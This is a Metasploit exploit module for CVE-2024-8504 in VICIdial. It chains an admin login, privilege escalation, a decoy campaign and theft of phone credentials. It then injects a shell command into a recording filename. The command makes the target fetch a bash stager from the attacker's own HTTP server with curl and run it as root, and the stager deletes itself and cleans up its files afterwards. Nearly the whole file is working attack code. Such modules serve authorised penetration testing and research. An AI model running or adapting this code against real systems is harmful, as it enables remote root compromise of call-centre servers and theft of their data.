##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2024-8504: authenticated command injection in VICIdial
# through the recording filename handled by the agent interface.
#
# The module serves a bash stager over its own HTTP server, logs in with the
# supplied credentials, prepares a throw-away campaign/list, logs in to the
# agent portal and starts a recording whose filename embeds a `curl ... && bash`
# command substitution pointing back at the stager.
class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  prepend Msf::Exploit::Remote::AutoCheck

  Rank = ExcellentRanking

  # Registers module metadata and the USERNAME / PASSWORD options.
  #
  # @param info [Hash] metadata overrides merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VICIdial Authenticated Remote Code Execution',
        'Description' => %q{
          An attacker with authenticated access to VICIdial as an "agent" can execute arbitrary shell commands as the "root" user.
          This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective.
        },
        'Author' => [
          'Valentin Lobstein', # Metasploit Module
          'Jaggar Henry of KoreLogic, Inc.' # Vulnerability Discovery
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-8504'],
          ['URL', 'https://korelogic.com/Resources/Advisories/KL-001-2024-012.txt']
        ],
        'DisclosureDate' => '2024-09-10',
        'Platform' => %w[unix linux],
        # Use the ARCH_CMD constant; %w[ARCH_CMD] produced the literal string "ARCH_CMD".
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'Unix/Linux Command Shell', {
              'Platform' => %w[unix linux],
              'Arch' => ARCH_CMD,
              'Privileged' => true
              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'WfsDelay' => 300,
          'SRVPORT' => 5000 # To not have conflict with FETCH_SRVPORT (both are needed for this exploit to work)
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    register_options([
      OptString.new('USERNAME', [true, 'Administrator username']),
      OptString.new('PASSWORD', [true, 'Administrator password']),
    ])
  end

  # Reads the version banner from agc/vicidial.php and compares it with the
  # last affected release (2.14-917a).
  #
  # @return [Msf::Exploit::CheckCode] Unknown when the page or banner cannot be
  #   read, Appears when the reported version is <= 2.14-917a, Safe otherwise
  def check
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'vicidial.php'),
      'method' => 'GET'
    })
    return CheckCode::Unknown unless res&.code == 200

    html_doc = res.get_html_document
    # Prefer the table cell that carries the banner; fall back to a raw line search.
    version_info = html_doc.at_xpath("//td[contains(text(), 'VERSION:')]")&.text ||
                   res.body.split("\n").find { |line| line.include?('VERSION:') }
    return CheckCode::Unknown unless version_info

    # Keep the optional build letter (e.g. "917a"). Without it "2.14-917" sorts
    # above "2.14-917a" (a missing segment counts as numeric 0, which ranks above
    # a string segment), so the boundary build was reported as Safe.
    extracted_version = version_info[/VERSION:\s*(\d+\.\d+-\d+[a-z]?)/, 1]
    return CheckCode::Unknown if extracted_version.nil? || extracted_version.empty?

    print_status("VICIdial version: #{extracted_version}")

    vulnerable_version = Rex::Version.new('2.14-917a')
    current_version = Rex::Version.new(extracted_version)

    # The decision is based on the banner only, so report Appears rather than Vulnerable.
    return CheckCode::Appears("VICIdial version #{extracted_version} detected") if current_version <= vulnerable_version

    CheckCode::Safe
  end

  # Runs the full attack chain. The order of the steps matters: each step uses
  # values returned by an earlier one.
  def exploit
    # Start the HTTP server to handle incoming requests from the payload
    start_service
    print_status('Server started.')

    # Add the resource to serve the payload and prepare the listener
    primer

    # Authenticate as an administrator using provided credentials
    target_uri, request_headers = authenticate_admin

    # Elevate user privileges by updating user settings
    update_user_settings(target_uri, request_headers)

    # Update the system settings for further exploitation
    update_system_settings(target_uri, request_headers)

    # Create a dummy campaign to act as a decoy during the attack
    fake_company_name, fake_campaign_id, fake_list_id, fake_list_name = create_dummy_campaign(target_uri, request_headers)

    # Modify the settings of the newly created dummy campaign
    update_campaign_settings(target_uri, request_headers, fake_company_name, fake_campaign_id)

    # Create a dummy list associated with the dummy campaign
    create_dummy_list(target_uri, request_headers, fake_list_name, fake_campaign_id, fake_list_id)

    # Retrieve phone credentials (extension and password) to authenticate as an agent
    phone_extension, phone_password, recording_extension = fetch_phone_credentials(target_uri, request_headers)

    # Authenticate to the agent portal using the retrieved phone credentials and campaign ID
    session_name, session_id = agent_portal_authentication(request_headers, phone_extension, phone_password, fake_campaign_id)

    # Insert a malicious recording that contains the payload, using the agent session
    insert_malicious_recording(request_headers, session_name, session_id, recording_extension)

    # Clean up by deleting the campaign created earlier
    delete_dummy_campaign(target_uri, request_headers, fake_campaign_id)

    # Start the cron job to execute the malicious payload
    wait_for_cron_job
  end

  # Registers "/" on the module's HTTP server so the target can fetch the stager.
  def primer
    add_resource('Path' => '/', 'Proc' => proc { |cli, req| on_request_uri_payload(cli, req) })
    print_status('Payload is ready at /')
  end

  # Builds the bash stager that wraps the encoded payload and hands it to
  # handle_request for delivery.
  #
  # @param cli the connected HTTP client
  # @param request the incoming HTTP request
  def on_request_uri_payload(cli, request)
    # The script removes the file bash is reading it from (fd 255), runs the
    # payload from the monitor directory, then deletes regular files there.
    bash_command = <<~BASH
      #!/bin/bash
      rm -- $(readlink /proc/$$/fd/255)
      cd /var/spool/asterisk/monitor/
      #{payload.encoded}
      find . -maxdepth 1 -type f -delete
    BASH

    handle_request(cli, request, bash_command)
  end

  # Answers a request to the module's HTTP server: "/" gets the stager, any
  # other URI gets a 404.
  #
  # @param cli the connected HTTP client
  # @param request the incoming HTTP request
  # @param response_payload [String] body returned for "/"
  def handle_request(cli, request, response_payload)
    print_status("Received request at: #{request.uri} - Client Address: #{cli.peerhost}")

    case request.uri
    when '/'
      print_status("Sending response to #{cli.peerhost} for /")
      send_response(cli, response_payload)
    else
      print_error("Request for unknown resource: #{request.uri}")
      send_not_found(cli)
    end
  end

  # Requests deletion of the dummy campaign (ADD=61 with confirmation) and
  # reports the outcome; a failure is logged but does not abort the module.
  #
  # @param target_uri [String] path to vicidial/admin.php
  # @param request_headers [Hash] headers carrying the Basic authorization
  # @param campaign_id [Integer] identifier of the campaign to delete
  def delete_dummy_campaign(target_uri, request_headers, campaign_id)
    print_status("Deleting dummy campaign with ID: #{campaign_id}")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri, 'vicidial', 'admin.php'),
      'method' => 'GET',
      'vars_get' => {
        'ADD' => '61',
        'campaign_id' => campaign_id,
        'CoNfIrM' => 'YES'
      },
      'headers' => request_headers
    })

    if res&.code == 200
      print_good("Campaign #{campaign_id} deleted successfully.")
    else
      print_error("Failed to delete campaign #{campaign_id}.")
    end
  end

  # Validates the supplied credentials against vicidial/admin.php using HTTP
  # Basic authentication.
  #
  # @return [Array(String, Hash)] the admin.php path and the headers holding
  #   the Authorization value, reused by the later admin requests
  # @raise fail_with(Failure::UnexpectedReply) when the reply is not HTTP 200
  def authenticate_admin
    username = datastore['USERNAME']
    password = datastore['PASSWORD']
    auth_header = "Basic #{Rex::Text.encode_base64("#{username}:#{password}")}"

    target_uri = normalize_uri(datastore['TARGETURI'], 'vicidial', 'admin.php')
    request_headers = { 'Authorization' => auth_header }

    res = send_request_cgi(
      'uri' => target_uri,
      'method' => 'GET',
      'vars_get' => { 'ADD' => '3', 'user' => username },
      'headers' => request_headers,
      'keep_cookies' => true
    )

    fail_with(Failure::UnexpectedReply, 'Failed to authenticate with credentials. Maybe hashing is enabled?') unless res&.code == 200

    print_good("Authenticated successfully as user '#{username}'")
    [target_uri, request_headers]
  end

  # Posts the user-modification form (ADD=4A) for the configured user with a
  # wide set of permissions enabled. The response is not inspected.
  #
  # @param target_uri [String] path to vicidial/admin.php
  # @param request_headers [Hash] headers carrying the Basic authorization
  def update_user_settings(target_uri, request_headers)
    faker = Faker::Internet
    # NOTE(review): 'default+English' and 'api_allowed_functions%5B%5D' look
    # pre-URL-encoded; if the HTTP client encodes vars_post again they reach the
    # server double-encoded - confirm before changing.
    user_settings_body = {
      'ADD' => '4A',
      'custom_fields_modify' => '0',
      'user' => datastore['USERNAME'],
      'DB' => '0',
      'pass' => datastore['PASSWORD'],
      'force_change_password' => 'N',
      'full_name' => Faker::Name.name,
      'user_level' => '9',
      'user_group' => 'ADMIN',
      'phone_login' => faker.username,
      'phone_pass' => faker.password,
      'active' => 'Y',
      'user_new_lead_limit' => '-1',
      'agent_choose_ingroups' => '1',
      'agent_choose_blended' => '1',
      'hotkeys_active' => '0',
      'scheduled_callbacks' => '1',
      'agentonly_callbacks' => '0',
      'next_dial_my_callbacks' => 'NOT_ACTIVE',
      'agentcall_manual' => '0',
      'manual_dial_filter' => 'DISABLED',
      'agentcall_email' => '0',
      'agentcall_chat' => '0',
      'vicidial_recording' => '1',
      'vicidial_transfers' => '1',
      'closer_default_blended' => '0',
      'user_choose_language' => '0',
      'selected_language' => 'default+English',
      'vicidial_recording_override' => 'DISABLED',
      'mute_recordings' => 'DISABLED',
      'alter_custdata_override' => 'NOT_ACTIVE',
      'alter_custphone_override' => 'NOT_ACTIVE',
      'agent_shift_enforcement_override' => 'ALL',
      'agent_call_log_view_override' => 'Y',
      'hide_call_log_info' => 'Y',
      'agent_lead_search' => 'NOT_ACTIVE',
      'lead_filter_id' => 'NONE',
      'user_hide_realtime' => '0',
      'allow_alerts' => '0',
      'preset_contact_search' => 'NOT_ACTIVE',
      'max_inbound_calls' => '0',
      'max_inbound_filter_enabled' => '0',
      'max_inbound_filter_min_sec' => '-1',
      'inbound_credits' => '-1',
      'max_hopper_calls' => '0',
      'max_hopper_calls_hour' => '0',
      'wrapup_seconds_override' => '-1',
      'ready_max_logout' => '-1',
      'RANK_AGENTDIRECT' => '0',
      'GRADE_AGENTDIRECT' => '10',
      'LIMIT_AGENTDIRECT' => '-1',
      'RANK_AGENTDIRECT_CHAT' => '0',
      'GRADE_AGENTDIRECT_CHAT' => '10',
      'LIMIT_AGENTDIRECT_CHAT' => '-1',
      'qc_enabled' => '0',
      'qc_user_level' => '1',
      'qc_pass' => '0',
      'qc_finish' => '0',
      'qc_commit' => '0',
      'hci_enabled' => '0',
      'realtime_block_user_info' => '0',
      'admin_hide_lead_data' => '0',
      'admin_hide_phone_data' => '0',
      'ignore_group_on_search' => '0',
      'view_reports' => '1',
      'access_recordings' => '0',
      'alter_agent_interface_options' => '1',
      'modify_users' => '1',
      'change_agent_campaign' => '1',
      'delete_users' => '1',
      'modify_usergroups' => '1',
      'delete_user_groups' => '1',
      'modify_lists' => '1',
      'delete_lists' => '1',
      'load_leads' => '1',
      'modify_leads' => '1',
      'export_gdpr_leads' => '0',
      'download_lists' => '1',
      'export_reports' => '1',
      'delete_from_dnc' => '1',
      'modify_campaigns' => '1',
      'campaign_detail' => '1',
      'modify_dial_prefix' => '1',
      'delete_campaigns' => '1',
      'modify_ingroups' => '1',
      'delete_ingroups' => '1',
      'modify_inbound_dids' => '1',
      'delete_inbound_dids' => '1',
      'modify_custom_dialplans' => '1',
      'modify_remoteagents' => '1',
      'delete_remote_agents' => '1',
      'modify_scripts' => '1',
      'delete_scripts' => '1',
      'modify_filters' => '1',
      'delete_filters' => '1',
      'ast_admin_access' => '1',
      'ast_delete_phones' => '1',
      'modify_call_times' => '1',
      'delete_call_times' => '1',
      'modify_servers' => '1',
      'modify_shifts' => '1',
      'modify_phones' => '1',
      'modify_carriers' => '1',
      'modify_email_accounts' => '0',
      'modify_labels' => '1',
      'modify_colors' => '1',
      'modify_languages' => '0',
      'modify_statuses' => '1',
      'modify_voicemail' => '1',
      'modify_audiostore' => '1',
      'modify_moh' => '1',
      'modify_tts' => '1',
      'modify_contacts' => '1',
      'callcard_admin' => '1',
      'modify_auto_reports' => '0',
      'add_timeclock_log' => '1',
      'modify_timeclock_log' => '1',
      'delete_timeclock_log' => '1',
      'manager_shift_enforcement_override' => '1',
      'pause_code_approval' => '1',
      'admin_cf_show_hidden' => '0',
      'modify_ip_lists' => '0',
      'ignore_ip_list' => '0',
      'two_factor_override' => 'NOT_ACTIVE',
      'vdc_agent_api_access' => '1',
      'api_list_restrict' => '0',
      'api_allowed_functions%5B%5D' => 'ALL_FUNCTIONS',
      'api_only_user' => '0',
      'modify_same_user_level' => '1',
      'download_invalid_files' => '1',
      'alter_admin_interface_options' => '1',
      'SUBMIT' => 'SUBMIT'
    }

    send_request_cgi(
      'uri' => target_uri,
      'method' => 'POST',
      'headers' => request_headers,
      'vars_post' => user_settings_body,
      'keep_cookies' => true
    )

    print_good('Updated user settings to increase privileges')
  end

  # Fetches the System Settings form, copies its current values, sets
  # outbound_autodial_active to '0' and posts the form back.
  #
  # @param target_uri [String] path to vicidial/admin.php
  # @param request_headers [Hash] headers carrying the Basic authorization
  # @raise fail_with(Failure::NotFound) when the form request gets no response
  def update_system_settings(target_uri, request_headers)
    res = send_request_cgi(
      'uri' => target_uri,
      'method' => 'GET',
      'headers' => request_headers,
      # ADD=311111111111111 selects the System Settings form; the previous
      # random numeric value could not address any particular page.
      # NOTE(review): confirm the constant against the targeted VICIdial release.
      'vars_get' => { 'ADD' => '311111111111111' },
      'keep_cookies' => true
    )

    fail_with(Failure::NotFound, 'Failed to fetch system settings') unless res

    # Parse once and reuse the document for both element types.
    settings_doc = res.get_html_document
    system_settings_body = {}

    settings_doc.css('input').each do |input_tag|
      field_name = input_tag['name']
      next unless field_name # a control without a name cannot be submitted

      system_settings_body[field_name] = input_tag['value']
    end

    settings_doc.css('select').each do |select_tag|
      field_name = select_tag['name']
      selected_tag = select_tag.at_css('option[selected]')
      next unless field_name && selected_tag

      system_settings_body[field_name] = selected_tag.text
    end

    system_settings_body['outbound_autodial_active'] = '0'

    send_request_cgi(
      'uri' => target_uri,
      'method' => 'POST',
      'headers' => request_headers,
      'vars_post' => system_settings_body,
      'keep_cookies' => true
    )

    print_good('Updated system settings')
  end

  # Creates a campaign (ADD=21) with a random company name and a random
  # six-digit identifier. The response is not inspected.
  #
  # @param target_uri [String] path to vicidial/admin.php
  # @param request_headers [Hash] headers carrying the Basic authorization
  # @return [Array] company name, campaign id, list id (campaign id + 1), list name
  def create_dummy_campaign(target_uri, request_headers)
    fake_company_name = Faker::Company.name
    fake_campaign_id = Faker::Number.number(digits: 6).to_i
    fake_list_id = fake_campaign_id + 1
    fake_list_name = "#{fake_company_name} List"

    campaign_settings_body = {
      'ADD' => '21',
      'campaign_id' => fake_campaign_id,
      'campaign_name' => fake_company_name,
      'user_group' => '---ALL---',
      'active' => 'Y',
      'allow_closers' => 'Y',
      'hopper_level' => '1',
      'next_agent_call' => 'random',
      'local_call_time' => '12am-12am',
      'get_call_launch' => 'NONE',
      'SUBMIT' => 'SUBMIT'
    }

    send_request_cgi(
      'uri' => target_uri,
      'method' => 'POST',
      'headers' => request_headers,
      'vars_post' => campaign_settings_body,
      'keep_cookies' => true
    )

    print_good("Created dummy campaign '#{fake_company_name}'")
    [fake_company_name, fake_campaign_id, fake_list_id, fake_list_name]
  end

  # Posts the campaign-modification form (ADD=41) for the dummy campaign.
  # The response is not inspected.
  #
  # @param target_uri [String] path to vicidial/admin.php
  # @param request_headers [Hash] headers carrying the Basic authorization
  # @param fake_company_name [String] campaign name
  # @param fake_campaign_id [Integer] campaign identifier
  def update_campaign_settings(target_uri, request_headers, fake_company_name, fake_campaign_id)
    update_campaign_body = {
      'ADD' => '41',
      'campaign_id' => fake_campaign_id,
      'old_campaign_allow_inbound' => 'Y',
      'campaign_name' => fake_company_name,
      'active' => 'Y',
      'lead_order' => 'DOWN',
      'lead_filter_id' => 'NONE',
      'no_hopper_leads_logins' => 'Y',
      'hopper_level' => '1',
      'reset_hopper' => 'N',
      'dial_method' => 'RATIO',
      'auto_dial_level' => '1',
      'SUBMIT' => 'SUBMIT',
      'form_end' => 'END'
    }

    send_request_cgi(
      'uri' => target_uri,
      'method' => 'POST',
      'headers' => request_headers,
      'vars_post' => update_campaign_body,
      'keep_cookies' => true
    )

    print_good('Updated dummy campaign settings')
  end

  # Creates a list (ADD=211) attached to the dummy campaign. The response is
  # not inspected.
  #
  # @param target_uri [String] path to vicidial/admin.php
  # @param request_headers [Hash] headers carrying the Basic authorization
  # @param fake_list_name [String] list name
  # @param fake_campaign_id [Integer] campaign the list belongs to
  # @param fake_list_id [Integer] list identifier
  def create_dummy_list(target_uri, request_headers, fake_list_name, fake_campaign_id, fake_list_id)
    list_settings_body = {
      'ADD' => '211',
      'list_id' => fake_list_id,
      'list_name' => fake_list_name,
      'campaign_id' => fake_campaign_id,
      'active' => 'Y',
      'SUBMIT' => 'SUBMIT'
    }

    send_request_cgi(
      'uri' => target_uri,
      'method' => 'POST',
      'headers' => request_headers,
      'vars_post' => list_settings_body,
      'keep_cookies' => true
    )

    print_good("Created dummy list '#{fake_list_name}' for campaign '#{fake_campaign_id}'")
  end

  # Follows the first "MODIFY" link on the ADD=10000000000 page and reads the
  # extension, pass and recording_exten inputs from the resulting form.
  #
  # @param target_uri [String] path to vicidial/admin.php
  # @param request_headers [Hash] headers carrying the Basic authorization
  # @return [Array(String, String, String)] extension, password, recording extension
  # @raise fail_with(Failure::NotFound) when a page, the link or a field is missing
  def fetch_phone_credentials(target_uri, request_headers)
    res = send_request_cgi(
      'uri' => target_uri,
      'method' => 'GET',
      'headers' => request_headers,
      'vars_get' => { 'ADD' => '10000000000' },
      'keep_cookies' => true
    )

    fail_with(Failure::NotFound, 'Failed to fetch phone credentials') unless res

    phone_uri_path = res.get_html_document.at_css('a:contains("MODIFY")')&.get_attribute('href')
    fail_with(Failure::NotFound, 'Failed to find the "MODIFY" link in the phone credentials page') unless phone_uri_path

    res = send_request_cgi(
      'uri' => normalize_uri(datastore['TARGETURI'], phone_uri_path),
      'method' => 'GET',
      'headers' => request_headers,
      'keep_cookies' => true
    )

    fail_with(Failure::NotFound, 'Failed to fetch phone credentials page') unless res

    phone_doc = res.get_html_document
    phone_extension = phone_doc.at_css('input[name="extension"]')&.get_attribute('value')
    phone_password = phone_doc.at_css('input[name="pass"]')&.get_attribute('value')
    recording_extension = phone_doc.at_css('input[name="recording_exten"]')&.get_attribute('value')

    unless [phone_extension, phone_password, recording_extension].all?
      fail_with(Failure::NotFound, 'Failed to retrieve one or more phone credentials from the page')
    end

    print_good("Found phone credentials: Extension=#{phone_extension}, Password=#{phone_password}, Recording Extension=#{recording_extension}")
    [phone_extension, phone_password, recording_extension]
  end

  # Logs in to the agent portal: discovers the MGR_login*/MGR_pass* field
  # names, submits the manager override, then performs the agent login and
  # extracts session_name / session_id from the returned JavaScript.
  #
  # @param request_headers [Hash] headers carrying the Basic authorization
  # @param phone_extension [String] phone login
  # @param phone_password [String] phone password
  # @param fake_campaign_id [Integer] campaign to log in to
  # @return [Array(String, String)] session name and session id
  # @raise fail_with when a required response or the session values are missing
  def agent_portal_authentication(request_headers, phone_extension, phone_password, fake_campaign_id)
    vdc_db_query_body = {
      'user' => datastore['USERNAME'],
      'pass' => datastore['PASSWORD'],
      'ACTION' => 'LogiNCamPaigns',
      'format' => 'html'
    }

    res = send_request_cgi(
      'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'vdc_db_query.php'),
      'method' => 'POST',
      'vars_post' => vdc_db_query_body,
      'keep_cookies' => true
    )

    fail_with(Failure::NotFound, 'Failed to retrieve hidden input fields') unless res

    doc = res.get_html_document
    mgr_login_name = doc.at_css('input[name^="MGR_login"]')&.get_attribute('name')
    mgr_pass_name = doc.at_css('input[name^="MGR_pass"]')&.get_attribute('name')

    if mgr_login_name && mgr_pass_name
      print_good("Retrieved dynamic field names: #{mgr_login_name}, #{mgr_pass_name}")
    else
      # Fallback: build the names from today's date in the local clock.
      # NOTE(review): presumably the server uses its own date - confirm.
      today_date = Time.now.strftime('%Y%m%d')
      mgr_login_name = "MGR_login#{today_date}"
      mgr_pass_name = "MGR_pass#{today_date}"
      print_status("Constructed dynamic field names manually: #{mgr_login_name}, #{mgr_pass_name}")
    end

    manager_login_body = {
      'DB' => '0',
      'JS_browser_height' => '1313',
      'JS_browser_width' => '2560',
      'phone_login' => phone_extension,
      'phone_pass' => phone_password,
      'VD_login' => datastore['USERNAME'],
      'VD_pass' => datastore['PASSWORD'],
      'MGR_override' => '1',
      'relogin' => 'YES',
      mgr_login_name => datastore['USERNAME'],
      mgr_pass_name => datastore['PASSWORD'],
      'SUBMIT' => 'SUBMIT'
    }

    send_request_cgi(
      'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'vicidial.php'),
      'method' => 'POST',
      'headers' => request_headers,
      'vars_post' => manager_login_body,
      'keep_cookies' => true
    )

    print_good('Entered "manager" credentials to override shift enforcement')

    agent_login_body = {
      'DB' => '0',
      'JS_browser_height' => '1313',
      'JS_browser_width' => '2560',
      'phone_login' => phone_extension,
      'phone_pass' => phone_password,
      'VD_login' => datastore['USERNAME'],
      'VD_pass' => datastore['PASSWORD'],
      'VD_campaign' => fake_campaign_id
    }

    res = send_request_cgi(
      'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'vicidial.php'),
      'method' => 'POST',
      'headers' => request_headers,
      'vars_post' => agent_login_body
    )

    # A timed-out request returns nil; fail cleanly instead of calling #body on nil.
    fail_with(Failure::Unreachable, 'No response received for the agent login request') unless res

    print_good('Authenticated as agent using phone credentials')

    session_name = res.body[/var\s+session_name\s*=\s*'([a-zA-Z0-9_]+)';/, 1]
    session_id = res.body[/var\s+session_id\s*=\s*'([0-9]+)';/, 1]

    fail_with(Failure::NotFound, 'Failed to retrieve session information') unless session_name && session_id

    print_good("Session Name: #{session_name}, Session ID: #{session_id}")
    [session_name, session_id]
  end

  # Starts a recording (MonitorConf) whose filename is a shell command
  # substitution that downloads and runs the stager, then stops the recording
  # (StopMonitorConf) using the returned recording id.
  #
  # @param request_headers [Hash] headers carrying the Basic authorization
  # @param session_name [String] agent session name
  # @param session_id [String] agent session id
  # @param recording_extension [String] recording extension of the phone
  # @raise fail_with(Failure::Unknown) when no recording id is returned
  def insert_malicious_recording(request_headers, session_name, session_id, recording_extension)
    # Strip the scheme so curl receives host:port/path only.
    uri = get_uri.sub(%r{\Ahttps?://}, '').chomp('/')

    random_filename = ".#{Rex::Text.rand_text_alphanumeric(rand(3..5))}"
    # $IFS stands in for spaces inside the injected command.
    malicious_filename = "$(curl$IFS-k$IFS@#{uri}$IFS-o$IFS#{random_filename}&&bash$IFS#{random_filename})"

    print_status("Generated malicious command: #{malicious_filename}")

    # NOTE(review): server_ip is taken from RHOSTS, which may hold more than one
    # target or a hostname - confirm whether the per-target address is intended.
    record1_body = {
      'server_ip' => datastore['RHOSTS'],
      'session_name' => session_name,
      'user' => datastore['USERNAME'],
      'pass' => datastore['PASSWORD'],
      'ACTION' => 'MonitorConf',
      'format' => 'text',
      'channel' => "Local/#{recording_extension}@default",
      'filename' => malicious_filename,
      'exten' => recording_extension,
      'ext_context' => 'default',
      'ext_priority' => '1',
      'FROMvdc' => 'YES',
      'FROMapi' => ''
    }

    res = send_request_cgi(
      'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'manager_send.php'),
      'method' => 'POST',
      'headers' => request_headers,
      'vars_post' => record1_body,
      'keep_cookies' => true
    )

    # res is nil on timeout; treat that the same as a reply without an id.
    recording_id = res&.body.to_s[/RecorDing_ID: ([0-9]+)/, 1]
    fail_with(Failure::Unknown, 'Failed to get recording ID') unless recording_id

    print_status(res.body)

    record2_body = {
      'server_ip' => datastore['RHOSTS'],
      'session_name' => session_name,
      'user' => datastore['USERNAME'],
      'pass' => datastore['PASSWORD'],
      'ACTION' => 'StopMonitorConf',
      'format' => 'text',
      'channel' => "Local/#{recording_extension}@default",
      'filename' => "ID:#{recording_id}",
      'exten' => session_id,
      'ext_context' => 'default',
      'ext_priority' => '1',
      'FROMvdc' => 'YES',
      'FROMapi' => ''
    }

    send_request_cgi(
      'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'conf_exten_check.php'),
      'method' => 'POST',
      'headers' => request_headers,
      'vars_post' => record2_body,
      'keep_cookies' => true
    )

    print_good('Stopped malicious recording to prevent file size from growing')
  end

  # Announces the wait and blocks on the HTTP service so the stager stays
  # reachable until the target fetches it.
  def wait_for_cron_job
    print_status("Waiting for #{datastore['WfsDelay']} seconds to allow the cron job to execute the payload...")
    service.wait
  end
end